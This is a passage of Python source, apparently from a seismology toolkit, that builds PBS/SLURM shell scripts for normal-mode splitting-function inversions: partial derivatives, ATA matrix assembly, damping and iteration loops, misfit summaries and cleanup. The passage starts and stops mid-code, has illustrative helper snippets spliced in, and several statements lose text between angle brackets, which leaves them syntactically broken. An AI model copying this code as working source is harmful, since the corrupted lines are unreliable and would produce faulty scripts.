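# The grep-for-NaN-and-rerun-once guard used above, restated in Python for
# clarity. This is an illustrative helper, not frospy code; 'run_step'
# stands in for the partial-derivatives binary and 'Ai.dat' for its output.
def has_nan(path):
    with open(path) as fh:
        return any('NaN' in line for line in fh)

def run_with_nan_retry(run_step, outfile='Ai.dat'):
    run_step()
    if has_nan(outfile):  # mirrors the 'rm A* && rerun' in the shell script
        run_step()
    return not has_nan(outfile)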
$N_seg == 0 ]; then\\n'\n if setup.intype == 'CST':\n if len(setup.events) > 1:\n msg += 'sed -i \"/$iterno $damp $SEGDIR $EVENT/s/$/ '\n msg += 'buildATA/\" $PO\\n'\n else:\n msg += 'sed -i \"/$iterno $damp $EVENT/s/$/ buildATA/\" $PO\\n'\n\n msg += '{buildATA} << EOF\\n'\n msg += '100.0\\n'\n msg += 'EOF\\n'\n msg += 'fi\\n'\n msg = msg.format(buildATA=join(setup.bindir, setup.bins.buildATA))\n return msg\n\n\ndef dorun_fsi_partials(setup):\n msg = '\\n'\n msg += '#----------------#\\n'\n msg += '# FSI Partials #\\n'\n msg += '#----------------#\\n'\n msg += 'rm Ar.dat Ai.dat allevents\\n'\n msg += get_segments(list(setup.seg_suffix.values())[0])\n msg += 'for FILE in \"${{SEGMENTS[@]}}\"\\n'\n msg += 'do\\n'\n msg += 'echo '\n msg += get_FILE_extension(list(setup.seg_suffix.values())[0])\n msg += ' >> allevents\\n'\n msg += 'done\\n'\n msg += '{partial_derivatives} < allevents\\n'\n\n msg = msg.format(partial_derivatives=join(setup.bindir,\n setup.bins.fsi_partials))\n return msg\n\n\ndef dorun_fsi_partials_array(setup):\n msg = '#----------------#\\n'\n msg += '# Fsi Partials #\\n'\n msg += '#----------------#\\n'\n\n msg += 'rm Ar.dat Ai.dat allevents\\n'\n\n msg += 'echo $EVENT >> allevents\\n\\n'\n msg += '{partial_derivatives} < allevents\\n'\n\n msg += '\\n'\n msg += '#--------------------#\\n'\n msg += '# Build ATA matrix #\\n'\n msg += '#--------------------#\\n'\n msg += '{buildATA} << EOF\\n'\n msg += '1000.0\\n'\n\n msg += 'EOF\\n'\n\n msg = msg.format(buildATA=join(setup.bindir, setup.bins.buildATA),\n partial_derivatives=join(setup.bindir,\n setup.bins.fsi_partials))\n return msg\n\n\ndef dorun_buildATA(setup):\n msg = '\\n'\n msg += '#--------------------#\\n'\n msg += '# Build ATA matrix #\\n'\n msg += '#--------------------#\\n'\n if setup.intype == 'CST':\n msg += 'echo \" -buildATA\" >> progress.out\\n'\n msg += '{buildATA} << EOF\\n'\n if setup.intype == 'CST':\n msg += '100.0\\n'\n elif setup.intype == 'FSI':\n msg += '1000.0\\n'\n msg += 'EOF\\n\\n'\n msg = msg.format(buildATA=join(setup.bindir, setup.bins.buildATA))\n return msg\n\n\ndef dorun_addATA(setup, uncertainties=False):\n rundir = setup.rundir\n if rundir.startswith('//nfs'):\n rundir = rundir.replace('//nfs/stig/', '/home/')\n\n msg = '#--------------#\\n'\n msg += '# Adding ATA #\\n'\n msg += '#--------------#\\n'\n if setup.intype == 'CST': # for PBS array only\n if uncertainties is False:\n Ndir = '$RUNDIR/allevents'\n else:\n Ndir = '$set_name'\n\n # if len(setup.events) > 1:\n # msg += 'echo \" -addATA\" >> $RUNDIR/progress.out\\n'\n # msg += 'rm ATAmatrix.dat ATd.dat dTd.dat ATA.dat ATA.list\\n\\n'\n # msg += 'Nmodes={msize}\\n'\n # msg += 'echo \"$Nmodes\" > ATA.list\\n'\n # msg += 'Nevents=`cat %s | wc -l`\\n' % Ndir\n # msg += 'echo \"$(( Nevents-1 ))\" >> ATA.list\\n\\n'\n # msg += 'i=0\\n'\n # msg += 'for f in `cat %s | sed \"s/ /\\//g\"`; do\\n' % Ndir\n # msg += 'if [ $i -eq 0 ]; then\\n'\n # msg += ' cp $RUNDIR/$f/ATAmatrix.dat ATA.dat\\n'\n # msg += ' cp $RUNDIR/$f/ATd.dat .\\n'\n # msg += ' cp $RUNDIR/$f/dTd.dat .\\n'\n # msg += 'else\\n'\n # msg += ' echo $RUNDIR/$f/ATAmatrix.dat >> ATA.list\\n'\n # msg += ' echo $RUNDIR/$f/ATd.dat >> ATA.list\\n'\n # msg += ' echo $RUNDIR/$f/dTd.dat >> ATA.list\\n'\n # msg += 'fi\\n'\n # msg += 'i=$(( i+1 ))\\n'\n # msg += 'done\\n'\n # msg += '{addATA} < ATA.list\\n'\n #\n # else:\n # msg += 'echo \" -addATA\" >> $RUNDIR/progress.out\\n'\n # msg += 'rm ATAmatrix.dat ATd.dat dTd.dat ATA.dat ATA.list\\n\\n'\n # msg += 'Nmodes={msize}\\n'\n # msg += 'echo 
\"$Nmodes\" > ATA.list\\n'\n # msg += 'Nevents=`cat %s | wc -l`\\n' % Ndir\n # msg += 'echo \"$(( Nevents-1 ))\" >> ATA.list\\n\\n'\n # msg += 'i=0\\n'\n # msg += 'for f in `cat %s | sed \"s/ /\\//g\"`; do\\n' % Ndir\n # msg += 'if [ $i -eq 0 ]; then\\n'\n # msg += ' cp $RUNDIR/$f/ATAmatrix.datATA.dat\\n'\n # msg += ' cp $RUNDIR/$f/ATd.dat .\\n'\n # msg += ' cp $RUNDIR/$f/dTd.dat .\\n'\n # msg += 'else\\n'\n # msg += ' echo $RUNDIR/$f/ATAmatrix.dat >> ATA.list\\n'\n # msg += ' echo $RUNDIR/$f/ATd.dat >> ATA.list\\n'\n # msg += ' echo $RUNDIR/$f/dTd.dat >> ATA.list\\n'\n # msg += 'fi\\n'\n # msg += 'i=$(( i+1 ))\\n'\n # msg += 'done\\n'\n # msg += '{addATA} < ATA.list\\n'\n msg += 'echo \" -Adding ATA\" >> progress.out\\n'\n msg += 'python {addATA} $RUNDIR %s\\n' % Ndir\n msg += 'cp ATA.dat ATAmatrix.dat\\n'\n\n msg = msg.format(addATA='merge.py')\n\n elif setup.intype == 'FSI':\n splittingdir = setup.splittingdir\n if splittingdir.startswith('//nfs'):\n splittingdir = splittingdir.replace('//nfs/stig', '/home')\n if isinstance(setup.events, AttribDict):\n tot_ev = 0\n for segdir_name, allevents in setup.events.items():\n if tot_ev == 0:\n events = sorted(allevents)\n dir = '%s/%s/%s' % (splittingdir, segdir_name, events[0])\n msg += 'echo \" -addATA\" >> $RUNDIR/progress.out\\n'\n msg += 'rm ATAmatrix.dat ATd.dat dTd.dat ATA.dat\\n'\n msg += 'cp %s/ATAmatrix.dat %s/ATA.dat\\n' % (dir, rundir)\n msg += 'cp %s/ATd.dat %s/.\\n' % (dir, rundir)\n msg += 'cp %s/dTd.dat %s/.\\n\\n' % (dir, rundir)\n tot_ev += len(allevents)\n\n tot_segdir = 0\n for segdir_name, allevents in setup.events.items():\n events = sorted(allevents)\n if len(events) > 1 and tot_segdir == 0:\n msg += '{addATA} < 1 and tot_segdir > 0:\n for e in events:\n dir = '%s/%s/%s' % (splittingdir, segdir_name, e)\n msg += '%s/ATAmatrix.dat\\n' % (dir)\n msg += '%s/ATd.dat\\n' % (dir)\n msg += '%s/dTd.dat\\n' % (dir)\n tot_segdir += 1\n\n if len(events) > 1:\n msg += 'EOF\\n'\n\n msg += 'cp ATA.dat ATAmatrix.dat\\n'\n\n msg = msg.format(addATA=join(setup.bindir, setup.bins.addATA),\n msize=setup.model_size)\n return msg\n\n\ndef dorun_invATA(setup):\n msg = '#-------------------#\\n'\n msg += '# Build new Model #\\n'\n msg += '#-------------------#\\n'\n msg += 'echo \" -invATA\" >> progress.out\\n'\n msg += '{invATA} << EOF\\n'\n msg += '$damp\\n'\n msg += '0\\n'\n msg += 'EOF\\n'\n\n if setup.intype == 'FSI':\n # transform mnew.dat to spline format\n msg += '%s < 0:\n msg += 'echo \" -write_dst\" >> progress.out\\n'\n msg += '{write_dst} << EOF\\n'\n for mode, smax in setup.modes_sc.items():\n msg += '%s\\n' % smax\n for mode, smax in setup.modes_sc_dst.items():\n msg += '%s\\n' % smax\n msg += 'EOF\\n\\n'\n msg = msg.format(write_dst=join(setup.bindir,\n setup.bins.write_dst))\n\n msg += 'echo \" -matrixcst\" >> progress.out\\n'\n msg += '{mdcpl} << EOF\\n'\n for mode, smax in setup.modes_sc.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n msg += '0 %s\\n' % smax\n if hasattr(setup, 'modes_cc'):\n # /home/deuss/bin/matrixcstC\n for mode, s in setup.modes_cc.items():\n msg += '%s %s\\n' % (s[0], s[1])\n msg += 'EOF\\n'\n msg = msg.format(mdcpl=join(setup.bindir, setup.bins.mdcpl))\n\n if len(setup.modes_sc_dst) > 0:\n msg += 'mv matrix.dat matrix-cst.dat\\n\\n'\n # /home/deuss/bin/matrixdst\n msg += 'echo \" -matrixdst\" >> progress.out\\n'\n msg += '{mdcplmq} << EOF\\n'\n for mode, smax in setup.modes_sc_dst.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n msg += 
'2 %s\\n' % smax\n msg += 'EOF\\n'\n msg += 'mv matrix.dat matrix-dst.dat\\n\\n'\n\n msg += 'echo \" -addmdcplmq\" >> progress.out\\n'\n msg += '{addmdcplmq} << EOF\\n'\n msg += 'matrix-cst.dat\\n'\n msg += 'matrix-dst.dat\\n'\n msg += 'EOF\\n'\n msg = msg.format(mdcplmq=join(setup.bindir, setup.bins.mdcplmq),\n addmdcplmq=join(setup.bindir,\n setup.bins.addmdcplmq))\n\n msg += '\\n'\n msg += 'echo \" -matdiag\" >> progress.out\\n'\n msg += '{matdiag} << EOF\\n' # /home/deuss/bin/matdiag\n msg += '0\\n'\n msg += 'EOF\\n\\n'\n\n msg = msg.format(matdiag=join(setup.bindir, setup.bins.matdiag))\n\n if setup.intype == 'FSI':\n pbsrundir = pbsrundir_sanity_check(setup.rundir)\n\n msg += 'rm misfit.dat\\n'\n msg += 'rm dsyni.dat dsynr.dat dobsi.dat dobsr.dat misfit-mode.dat\\n'\n msg += '{mdcpl} -model {model} < 1:\n msg += 'PO=$MAINDIR/progress.out\\n'\n msg += 'sed -i \"/$iterno $damp $SEGDIR $EVENT/s/$/ '\n msg += 'synseis_inv/\" $PO\\n'\n else:\n msg += 'PO=$MAINDIR/progress.out\\n'\n msg += 'sed -i \"/$iterno $damp $EVENT/s/$/ synseis_inv/\" $PO\\n'\n\n msg += '{synseis_inv} $EVENT << EOF\\n'\n msg += 'rr.dat\\n'\n msg += 'rr1.dat\\n'\n msg += 'ww.dat\\n'\n msg += 'EOF\\n\\n'\n if uncertainties is False:\n msg += synseis_sanity_check(setup)\n\n msg = msg.format(synseis_inv=join(setup.bindir, setup.bins.synseis_inv))\n return msg\n\n\ndef synseis_sanity_check(setup):\n msg = 'count=`grep \"NaN\" \"$EVENT\".misfit | wc -l`\\n\\n'\n msg += 'if [ $count != 0 ]; then\\n'\n msg += '\\tstat=`grep -B 3 \"NaN\" \"$EVENT\".misfit'\n msg += \" | cut -d'-' -f1 | cut -d' ' -f1`\\n\"\n msg += '\\techo \"synseis -NaN found in Station: $SEGDIR/$EVENT '\n msg += '$stat\" >> $MAINDIR/progress.err\\n'\n if len(setup.events) > 1:\n msg += '\\tsed -i \"/$iterno $damp $SEGDIR $EVENT/s/$/ '\n msg += 'NaN found in Station: '\n msg += '$SEGDIR/$EVENT $stat/\" $PO\\n'\n else:\n msg += '\\tsed -i \"/$iterno $damp $EVENT/s/$/ NaN found in Station: '\n msg += '$EVENT $stat/\" $PO\\n'\n msg += '\\trm misfit.dat 2> /dev/null\\n'\n msg += '\\trm dsyni.dat dsynr.dat dobsi.dat dobsr.dat '\n msg += 'misfit-mode.dat 2> /dev/null\\n'\n msg += '\\tcd $MAINDIR\\n'\n msg += '\\texit 404\\n'\n msg += 'fi\\n\\n'\n\n msg = msg.format(synseis_inv=join(setup.bindir, setup.bins.synseis_inv))\n return msg\n\n\ndef dorun_misfits(setup):\n msg = '\\n'\n msg += '#--------------------#\\n'\n msg += '# Calculate misfit #\\n'\n msg += '#--------------------#\\n'\n if setup.intype == 'FSI':\n msg += '{avmisfit_allmodes}\\n'\n msg += 'echo \" -avmisfit\" >> progress.out\\n'\n msg += '{avmisfit}\\n' # /home/deuss/bin/avmisfit\n msg += 'echo \" -posteriorCd\" >> progress.out\\n'\n msg += '{posterioriCd}\\n' # /home/deuss/bin/posterioriCd\n msg += 'echo \" -inversion_summary\" >> progress.out\\n'\n msg += 'python {invout} $RUNDIR $iterno {summary_dir} {schema}\\n'\n msg += 'rm inversion.out 2> /dev/null\\n'\n # #### dorun-newC3 new end\n if setup.intype == 'CST':\n msg += 'cp mnew-error.dat mnew.dat\\n'\n msg += 'cp mnew.dat {summary_dir}/mnew-it\"$iterno\"-d\"$damp\".dat\\n'\n msg += 'cp mnew.dat mold.dat\\n'\n msg += 'cp mnew.dat mcst.dat\\n'\n elif setup.intype == 'FSI':\n msg += 'cp misfit.dat misfit_it${{iterno}}_d${{damp}}.dat\\n'\n msg += 'cp mnew.dat mnew_it${{iterno}}_d${{damp}}.dat\\n'\n msg += 'cp mnew.dat mold.dat\\n'\n\n msg = msg.format(avmisfit_allmodes=join(setup.bindir,\n setup.bins.avmisfit_allmodes),\n avmisfit=join(setup.bindir, setup.bins.avmisfit),\n posterioriCd=join(setup.bindir, setup.bins.posterioriCd),\n 
invout=\"write_inversion_out.py\",\n summary_dir=setup.inversion_outdir,\n schema=setup.schema)\n return msg\n\n\ndef dorun_misfits_array(setup, uncertainties=False):\n if uncertainties is True:\n setup.inversion_outdir = 'uncertainties'\n # In this case we use the same function for the startup and new runs\n msg = '\\n'\n msg += '#--------------------#\\n'\n msg += '# Calculate misfit #\\n'\n msg += '#--------------------#\\n'\n msg += 'echo \" -avmisfit\" >> progress.out\\n'\n if len(setup.events) > 1:\n msg += '{avmisfit_allmodes}\\n'\n msg += '{avmisfit}\\n' # /home/deuss/bin/avmisfit\n if len(setup.segmentsdir) > 1:\n for idir, s in enumerate(setup.segmentsdir.keys()):\n msg += 'python {invout} $RUNDIR $(($iterno-1)) '\n if uncertainties is True:\n msg2 = '{summary_dir} \"%s-$set_filename\"' % s\n else:\n msg2 = '{summary_dir} %s' % s\n if idir != 0:\n msg2 += ' no_summary'\n msg += msg2\n msg += '\\n'\n else:\n msg += 'python {invout} $RUNDIR $(($iterno-1)) {summary_dir}\\n'\n\n msg += '\\n'\n\n msg += 'if [[ ! $iterno -eq 1 ]]; then\\n'\n msg += 'echo \" -posteriorCd\" >> progress.out\\n'\n msg += '{posterioriCd}\\n' # /home/deuss/bin/posterioriCd\n msg += 'echo \" -inversion_summary\" >> progress.out\\n'\n msg += 'rm inversion.out 2> /dev/null\\n'\n msg += 'cp mnew-error.dat mnew.dat\\n'\n if setup.intype == 'CST':\n msg += 'cp mnew.dat mcst.dat\\n\\n'\n\n if uncertainties is False:\n msg += 'cp mnew.dat {summary_dir}/mnew-it\"$(($iterno-1))\"'\n msg += '-d\"$damp\".dat\\n'\n msg += 'cp mnew.dat mold.dat\\n\\n'\n msg = msg.format(avmisfit_allmodes=join(setup.bindir,\n setup.bins.avmisfit_allmodes),\n avmisfit=join(setup.bindir, setup.bins.avmisfit),\n posterioriCd=join(setup.bindir, setup.bins.posterioriCd),\n invout=\"write_inversion_out.py\",\n summary_dir=setup.inversion_outdir)\n return msg\n\n\ndef dorun_summary(setup, uncertainties=False):\n msg = '\\n'\n msg += '#---------------------#\\n'\n msg += '# INVERSION SUMMARY #\\n'\n msg += '#---------------------#\\n'\n if uncertainties is True:\n msg += 'cp mnew.dat {summary_dir}/mnew-it\"$(($iterno-1))\"'\n msg += '-d\"$damp\"-\"$set_filename\".dat\\n'\n else:\n msg += 'cp Cmatrix.dat {summary_dir}/'\n msg += 'Cmatrix-it\"$(($iterno-1))\"-d\"$damp\".dat\\n'\n msg += 'cp Rmatrix.dat {summary_dir}/'\n msg += 'Rmatrix-it\"$(($iterno-1))\"-d\"$damp\".dat\\n'\n if setup.keep_all_output is not True:\n msg += 'for mf in *.misfit; do cp $mf '\n msg += '{summary_dir}/${{mf%.misfit}}_d\"$damp\".misfit; done\\n'\n msg = msg.format(summary_dir=setup.inversion_outdir)\n return msg\n\n\ndef dorun_cleanup(setup):\n msg = 'rm inversion.dat *misfit* mdcpl.out *.bin mnew* Cmat* Rmat*\\n'\n if setup.keep_all_output is not True:\n msg += 'ls *dat | xargs -I {{}} find {{}} -type f -not -name '\n msg += \"'???????.dat' -delete \\n\"\n return msg\n\n\ndef dorun_SLURM_header(setup):\n pbsrundir = pbsrundir_sanity_check(setup.rundir)\n msg = '#!/bin/bash\\n'\n msg += '#SBATCH --exclusive\\n'\n msg += '#SBATCH --mem=200G\\n'\n msg += '#SBATCH --partition=%s\\n' % setup.partition\n msg += '#SBATCH --nodes=1\\n'\n msg += '#SBATCH --cpus-per-task=48\\n'\n msg += '#SBATCH --threads-per-core=2\\n'\n if setup.walltime is not None:\n msg += '#SBATCH --time=%s\\n' % setup.walltime\n else:\n msg += '#SBATCH --time=24:00:00\\n'\n msg += '#SBATCH --job-name=%s.job\\n' % setup.pbsjob\n # msg += '#SBATCH --output=%s/main.%%A.%%a.out\\n' % (pbsrundir)\n msg += '#SBATCH --error=%s/main.%%A.%%a.err\\n' % (pbsrundir)\n msg += '#SBATCH --export=all\\n'\n\n if 
hasattr(setup, 'pbsmail'):\n msg += '#SBATCH --mail-type=ALL\\n'\n msg += '#SBATCH --mail-user=%s\\n' % setup.pbsmail\n msg += 'RUNDIR=%s\\n' % pbsrundir\n return msg\n\n\ndef dorun_submission_header(setup, type='default', uncertainties=False):\n\n pbsrundir = pbsrundir_sanity_check(setup.rundir)\n\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n msg = '#!/bin/bash\\n'\n\n if type in ('default', 'submission', 'depend'):\n msg += '#SBATCH --exclusive\\n'\n msg += '#SBATCH --mem=200G\\n'\n\n if setup.exclude is not None:\n msg += '#SBATCH --exclude=%s\\n' % setup.exclude\n\n msg += '#SBATCH --partition=%s\\n' % setup.partition\n\n if hasattr(setup, 'pbsmail'):\n msg += '#SBATCH --mail-type=ALL\\n'\n msg += '#SBATCH --mail-user=%s\\n' % setup.pbsmail\n msg += '#SBATCH --nodes=%s\\n' % setup.nodes\n msg += '#SBATCH --cpus-per-task=48\\n'\n msg += '#SBATCH --threads-per-core=2\\n'\n if setup.walltime is not None:\n msg += '#SBATCH --time=%s\\n' % setup.walltime\n else:\n msg += '#SBATCH --time=24:00:00\\n'\n\n if type == 'default':\n if uncertainties is False:\n msg += '#SBATCH --job-name=%s\\n' % setup.pbsjob\n msg += '#SBATCH --error=%s/main.%%A.%%a.err\\n' % (pbsrundir)\n else:\n msg += '#SBATCH --job-name=%s.uncertainties\\n' % setup.pbsjob\n msg += '#SBATCH --error=%s/uncert.%%A.%%a.err\\n' % (pbsrundir)\n msg += '#SBATCH --export=all\\n'\n if setup.rundir.startswith('/quanta'):\n msg += 'MOM=%s\\n' % pbsrundir\n msg += 'RUNDIR=/tmp/$USER\\n'\n msg += 'if [ -e $RUNDIR ]; then rm -rf $RUNDIR; fi\\n'\n msg += 'mkdir -p $RUNDIR\\n'\n msg += 'rsync -r $MOM/* $RUNDIR/.\\n'\n else:\n msg += 'RUNDIR=%s\\n' % pbsrundir\n\n elif type == 'submission':\n msg += '#SBATCH --job-name=%s.job\\n' % setup.pbsjob\n # msg += '#SBATCH --output=%s/log/main.%%A.%%a.out\\n' % (pbsrundir)\n msg += '#SBATCH --error=%s/log/main.%%A.%%a.err\\n' % (pbsrundir)\n msg += '#SBATCH --export=all\\n'\n msg += 'RUNDIR=%s\\n' % pbsrundir\n\n elif type == 'depend':\n # msg += '#SBATCH --output=%s/log/array.%%A.%%a.out\\n' % pbsrundir\n msg += '#SBATCH --error=%s/log/array.%%A.%%a.err\\n' % pbsrundir\n msg += 'RUNDIR=%s\\n' % pbsrundir\n\n elif type == 'array':\n if not setup.rundir.startswith('/quanta'):\n msg += 'MAINDIR=%s\\n' % pbsrundir\n if len(setup.events) > 1:\n msg += 'EVENT=$1\\n'\n msg += 'iterno=$2\\n'\n msg += 'ed_it=$3\\n'\n msg += 'SEGDIR=$4\\n'\n msg += 'damp=$5\\n'\n msg += 'MAINDIR=$6\\n\\n'\n if setup.intype == 'CST':\n msg += 'RUNDIR=$MAINDIR/$SEGDIR/$EVENT\\n'\n else:\n msg += 'EVENT=$1\\n'\n msg += 'iterno=$2\\n'\n msg += 'ed_it=$3\\n'\n msg += 'damp=$4\\n'\n msg += 'MAINDIR=$5\\n\\n'\n if setup.intype == 'CST':\n msg += 'RUNDIR=$MAINDIR/$EVENT\\n'\n\n if setup.intype == 'FSI':\n splittingdir = setup.splittingdir\n if splittingdir.startswith('//nfs'):\n splittingdir = splittingdir.replace('//nfs/stig/',\n '/home/')\n msg += 'SPLITDIR=%s\\n' % (splittingdir)\n\n if len(setup.events) > 1:\n msg += 'RUNDIR=$SPLITDIR/$SEGDIR/$EVENT\\n'\n\n else:\n msg += 'RUNDIR=$SPLITDIR/$EVENT\\n'\n\n else:\n msg = ''\n if hasattr(setup, 'pbsmail'):\n msg += '#PBS -m abe -M %s\\n' % setup.pbsmail\n if type == 'default':\n msg += '#PBS -N %s\\n' % setup.pbsjob\n msg += '#PBS -l nodes=1:ppn=1\\n'\n msg += '#PBS -e log.$PBS_JOBNAME.$PBS_JOBID.err\\n'\n msg += '#PBS -o log.$PBS_JOBNAME.$PBS_JOBID.out\\n'\n msg += 'RUNDIR=%s\\n' % pbsrundir\n\n elif type == 'depend':\n msg += '#PBS -l nodes=1:ppn=1\\n'\n msg += '#PBS -e 
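# The submission headers above all follow the same accumulate-a-string
# pattern; condensed here into a small standalone helper (illustrative
# only, with field names chosen to mirror the setup object):
def slurm_header(jobname, partition, walltime='24:00:00', mail=None):
    lines = ['#!/bin/bash',
             '#SBATCH --partition=%s' % partition,
             '#SBATCH --time=%s' % walltime,
             '#SBATCH --job-name=%s' % jobname]
    if mail is not None:
        lines += ['#SBATCH --mail-type=ALL',
                  '#SBATCH --mail-user=%s' % mail]
    return '\n'.join(lines) + '\n'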
log/log.$PBS_JOBNAME.$PBS_JOBID.err\\n'\n msg += '#PBS -o log/log.$PBS_JOBNAME.$PBS_JOBID.out\\n'\n msg += 'RUNDIR=%s\\n' % pbsrundir\n\n elif type == 'array':\n if (\n isinstance(setup.segmentsdir, AttribDict) or\n isinstance(setup.segmentsdir, dict)\n ):\n tot_ev = 0\n for segdir, allevents in setup.events.items():\n tot_ev += len(allevents)\n n = tot_ev\n\n if n > 96:\n t = 96\n else:\n t = n\n else:\n n = len(setup.events)\n t = n\n msg += '#PBS -l walltime=1:00:00,nodes=1:ppn=1\\n'\n msg += '#PBS -t 1-%s%%%s\\n' % (n, t)\n msg += '#PBS -e log/log.$PBS_JOBNAME.$PBS_JOBID.err\\n'\n msg += '#PBS -o log/log.$PBS_JOBNAME.$PBS_JOBID.out\\n\\n'\n msg += 'MAINDIR=%s\\n' % pbsrundir\n\n return msg\n\n\ndef script(setup, output='pbs'):\n \"\"\"\n Creates a pbs or bash script to submit an inversion, using the information\n given in the setup object.\n \"\"\"\n\n if setup.intype == 'CST':\n if output in [None, 'pbs', 'SLURM', 'slurm']:\n msg = dorun_submission_header(setup)\n elif output == 'bash':\n msg = 'RUNDIR=%s\\n' % setup.rundir\n\n msg += 'cd $RUNDIR\\n'\n\n msg += '\\n'\n msg += '#----------------#\\n'\n msg += '# DAMPING LOOP #\\n'\n msg += '#----------------#\\n'\n msg += 'for damp in %s\\n' % get_damping_string(setup)\n msg += 'do\\n'\n msg += 'echo \"Starting run for damping: $damp\" >> progress.out\\n'\n # /home/deuss/modes/allsplitting/dorun-itmC3.sh ${lmax} 4 0 ${damp}\n\n msg += dorun_startup(setup)\n\n msg += '\\n'\n msg += '#------------------------#\\n'\n msg += '# ITERATION LOOP START #\\n'\n msg += '#------------------------#\\n'\n # ##/home/deuss/modes/allsplitting/dorun-derivC3.sh $1 $2 $3\\n'\n m = 'for (( iterno=%s; iterno<=%s; iterno++ ))\\n'\n msg += m % (setup.iterations[0], setup.iterations[1])\n msg += 'do\\n'\n msg += 'echo \" Iteration: $iterno\" >> progress.out\\n'\n\n msg += dorun_cst_partials(setup)\n\n if len(setup.modes_sc_dst) > 0:\n msg += dorun_dst_partials(setup)\n\n msg += dorun_buildATA(setup)\n\n msg += dorun_invATA(setup)\n\n # '/home/deuss/modes/allsplitting/dorun-newC3.sh $1 $2 $3\\n'\n msg += dorun_mdcpl(setup)\n\n msg += dorun_synseis_inv(setup)\n\n msg += dorun_misfits(setup)\n\n msg += 'done\\n'\n msg += '\\n'\n msg += '#----------------------#\\n'\n msg += '# ITERATION LOOP END #\\n'\n msg += '#----------------------#\\n'\n\n msg += dorun_summary(setup)\n\n msg += 'done\\n'\n msg += '#--------------------#\\n'\n msg += '# DAMPING LOOP END #\\n'\n msg += '#--------------------#\\n'\n msg += dorun_cleanup(setup)\n msg += 'echo \"Finished Run\" >> progress.out\\n'\n\n elif setup.intype == 'FSI':\n msg = dorun_submission_header(setup)\n msg += 'cd $RUNDIR\\n'\n\n modes = ''\n for mode in setup.modedirs:\n mdir = join(setup.splittingdir, mode)\n modes = modes + \"%s \" % (mdir)\n\n msg += dorun_preprundir(setup)\n\n msg += '\\n'\n msg += '#----------------#\\n'\n msg += '# DAMPING LOOP #\\n'\n msg += '#----------------#\\n'\n msg += 'for damp in %s\\n' % get_damping_string(setup)\n msg += 'do\\n'\n msg += 'echo \"Starting run for damping: $damp\" >> progress.out\\n'\n\n msg += 'echo \"Starting up\" >> progress.out\\n'\n msg += 'for mdir in %s\\n' % (modes)\n msg += 'do\\n'\n msg += 'cd $mdir\\n'\n msg += dorun_startup(setup)\n msg += 'done\\n'\n\n msg += '\\n'\n msg += '#------------------------#\\n'\n msg += '# ITERATION LOOP START #\\n'\n msg += '#------------------------#\\n'\n msg += 'for (( iterno=%s; iterno<=%s; iterno++ ))\\n'\n msg = msg % (setup.iterations[0], setup.iterations[1])\n msg += 'do\\n'\n msg += 'echo \" Iteration: $iterno\" >> 
progress.out\\n'\n\n msg += 'echo \" -fsi partials\" >> progress.out\\n'\n msg += 'echo \" -buildATA\" >> progress.out\\n'\n msg += '# BEGIN LOOP THROUGH MODE FOLDERS\\n'\n msg += 'for mdir in %s\\n' % (modes)\n msg += 'do\\n'\n msg += 'cd $mdir\\n'\n msg += dorun_fsi_partials(setup)\n\n msg += dorun_buildATA(setup)\n\n msg += 'done\\n' # end loop over mode folders\n msg += '# END LOOP THROUGH MODE FOLDERS\\n'\n\n # GO BACK TO INVERSION FOLDER\n msg += '#\\n'\n msg += 'cd $RUNDIR\\n'\n\n msg += dorun_addATA(setup)\n\n msg += dorun_invATA(setup)\n\n # GO TO EACH MODES-FOLDER TO CALCULATE MDCPL, MATDIAG, SYNSEIS, MISFIT\n msg += '#\\n'\n msg += '# BEGIN LOOP THROUGH MODE FOLDERS\\n'\n msg += 'for mdir in %s\\n' % (modes)\n msg += 'do\\n'\n msg += 'cd $mdir\\n'\n\n msg += dorun_mdcpl(setup)\n\n msg += dorun_synseis_inv(setup)\n\n msg += 'done\\n' # end loop over mode folders\n msg += '# END LOOP THROUGH MODE FOLDERS\\n'\n msg += '#\\n'\n\n # AND BACK TO INVERSION FOLDER\n msg += 'cd $RUNDIR\\n'\n\n msg += dorun_misfits(setup)\n\n msg += 'done\\n'\n msg += '\\n'\n msg += '#----------------------#\\n'\n msg += '# ITERATION LOOP END #\\n'\n msg += '#----------------------#\\n'\n\n msg += dorun_summary(setup)\n\n msg += 'done\\n'\n msg += '#--------------------#\\n'\n msg += '# DAMPING LOOP END #\\n'\n msg += '#--------------------#\\n'\n msg += dorun_cleanup(setup)\n msg += 'echo \"Finished Run\" >> progress.out\\n'\n\n if output == 'bash':\n pbs_file = 'run_me.sh'\n elif output == 'slurm':\n pbs_file = 'sbatch_me.sh'\n else:\n pbs_file = 'qsub_me.pbs'\n\n if setup.rundir.startswith('/scratch'):\n src = setup.rundir\n dst = setup.rundir.replace('/scratch', '/quanta1/home')\n dst = '/'.join(dst.split('/')[:-1])\n msg += 'SRC=%s\\n' % (src)\n msg += 'DST=%s\\n' % (dst)\n msg += 'mkdir -p %s \\n' % dst\n msg += 'rsync -r --delete $SRC $DST'\n\n pbs_path = join(setup.rundir, pbs_file)\n with open(pbs_path, 'w+') as fh:\n fh.write(msg)\n return\n\n\ndef startup_script(setup):\n # for array pbs dependencies\n \"\"\"\n Creates a pbs script to submit an inversion, using the information\n given in the setup object.\n \"\"\"\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n if setup.intype == 'CST':\n msg = '#!/bin/bash\\n'\n msg += 'damp=${{1}}\\n'\n msg += 'RUNDIR=${{2}}\\n\\n'\n elif setup.intype == 'FSI':\n msg = '#!/bin/bash\\nsdir=${{1}}\\n'\n msg += 'RUNDIR=%s\\n' % setup.rundir\n else:\n msg = dorun_submission_header(setup, type='depend')\n\n if setup.intype == 'CST':\n m = 'cd $RUNDIR\\n'\n m += '\\n'\n\n # Startmodel mzero.dat and mcst.dat are generated by create.startmodel\n m += '#---------------------------#\\n'\n m += '# STARTUP WITH ZERO MODEL #\\n'\n m += '#---------------------------#\\n'\n\n m += 'echo \"Starting run for damping: $damp\" >> progress.out\\n'\n m += 'echo \"Starting up\" >> progress.out\\n'\n m += 'rm inversion.dat inversion.out att.dat 2> /dev/null\\n'\n m += '\\n'\n m += 'cp mzero.dat mcst.dat\\n'\n m += 'cp mzero.dat inversion_out/.\\n\\n'\n m += 'echo \" -rot+ellip\" >> progress.out\\n'\n m += '{rot_ellip}\\n\\n'\n m = m.format(rot_ellip=join(setup.bindir, 